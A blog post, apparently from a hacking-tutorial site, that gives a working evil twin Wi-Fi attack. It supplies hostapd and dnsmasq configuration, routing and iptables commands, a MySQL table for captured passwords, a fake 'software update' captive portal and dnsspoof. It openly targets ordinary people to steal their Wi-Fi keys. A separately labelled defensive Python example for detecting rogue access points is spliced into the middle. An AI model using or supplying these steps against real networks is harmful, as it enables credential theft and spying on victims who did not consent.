The evil twin is a very powerful attack used by many hackers to gain access to other people's Wi-Fi.
An evil twin attack can be performed easily; instead of writing scripts or using programs such as Fluxion, this attack can come in handy.
Creating a fake access point can be useful in many scenarios.
We can monitor and spy on victims, steal the credentials and passwords they enter, and steal Wi-Fi passwords without using a dictionary, even if the network uses WPA or WPA2.
The same method can be used to start a normal fake AP or honeypot for other uses.
A quick definition of an evil twin attack is:
An attack in which a hacker sets up a fake Wi-Fi network that looks like a legitimate access point in order to steal victims' sensitive details.
Most often, the victims of such attacks are ordinary people with limited knowledge about security.
When the victim connects to our fake access point, we display a page asking for a software update; the victim has to enter the password and click enter, and the password is stored in our database management system, which is MySQL.
To display the page, you can download templates using Google.
"An evil twin attack can be done in a number of ways."
Let's see what steps are involved in this attack.
Step 1: Start a fake access point with the same name as the target network.
Step 2: Disconnect a client.
Step 3: Wait for them to connect to the fake access point.
Step 4: Once they connect, automatically display a page asking for a network key.
Let's get into the process,
# --- Preparing ---:
apt-get update
apt-get install hostapd dnsmasq apache2
airmon-ng start wlan0
mkdir ~/fap
cd ~/fap
nano hostapd.conf
# Instructions for hostapd.conf:
interface=[INTERFACE NAME]
driver=nl80211
ssid=[WiFi NAME]
hw_mode=g
channel=8
macaddr_acl=0
ignore_broadcast_ssid=0
nano dnsmasq.conf
# Instructions for dnsmasq.conf:
interface=[INTERFACE NAME]
dhcp-range=192.168.1.2, 192.168.1.30, 255.255.255.0, 12h
dhcp-option=3, 192.168.1.1
dhcp-option=6, 192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
# Routing table and gateway:
ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
# Internet access:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
# mysql database:
service mysql start
mysql
create database fap;
create user fapuser;
grant all on rogueap.* to 'fapuser'@'localhost' identified by 'fappassword';
use fap;
create table wpa_keys(password1 varchar(40), password2 varchar(40));
ALTER DATABASE fap CHARACTER SET 'utf8';
select * from wpa_keys;
# Captive portal setup:
rm -rf /var/www/html/*
mv ~/Downloads/fap.zip /var/www/html
cd /var/www/html
unzip fap.zip
service apache2 start
# --- Starting the attack ---:
hostapd hostapd.conf
dnsmasq -C dnsmasq.conf -d
dnsspoof -i wlan0mon
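Seen from the defender's side, the access point built from the hostapd.conf above reuses the target's SSID but sets no WPA options, so it is advertised as an open network from a radio the network owner does not operate. The following is an added example, not part of the original post, that flags such beacons in a wireless scan; the `Beacon` type, the `BASELINE` inventory and the scan records are constructed for illustration.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Beacon:
    ssid: str
    bssid: str
    channel: int
    security: str  # "OPEN", "WPA2", ...

# Assumed inventory of the access points the operator really runs (constructed).
BASELINE = {
    "CorpWiFi": {"bssids": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
                 "security": "WPA2"},
}

# Constructed scan results, e.g. parsed from a wireless survey tool.
SCAN = [
    Beacon("CorpWiFi", "AA:BB:CC:00:00:01", 1, "WPA2"),
    Beacon("CorpWiFi", "aa:bb:cc:00:00:02", 6, "WPA2"),
    Beacon("CorpWiFi", "02:11:22:33:44:55", 8, "OPEN"),    # same SSID, open, unknown radio
    Beacon("CorpWiFi", "02:11:22:33:44:66", 11, "WPA2"),   # same SSID, unknown radio
    Beacon("CoffeeShop", "de:ad:be:ef:00:01", 3, "OPEN"),  # not in inventory, ignored
]

def find_twin_candidates(scan, baseline):
    """Return (severity, bssid, channel, reasons) for suspicious beacons."""
    findings = []
    for b in scan:
        known = baseline.get(b.ssid)
        if known is None:
            continue  # only SSIDs in our inventory are checked
        reasons = []
        if b.bssid.lower() not in known["bssids"]:
            reasons.append("unknown BSSID")
        # Checked independently of the BSSID, because a BSSID can be cloned.
        downgraded = b.security.upper() != known["security"]
        if downgraded:
            reasons.append(f"security {b.security} != expected {known['security']}")
        if reasons:
            severity = "high" if downgraded else "medium"
            findings.append((severity, b.bssid.lower(), b.channel, reasons))
    return sorted(findings)

if __name__ == "__main__":
    for finding in find_twin_candidates(SCAN, BASELINE):
        print(finding)
```

A "medium" finding may also be a newly installed legitimate access point that is missing from the inventory, so it needs a check against the asset list before escalation.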
A number of people fall for this attack, and that's it for today. Comment below how you performed this attack.
Thank you for reading our blog.
We hope you're enjoying our content; please share our blog.
credits:-
spidyboy dark rider.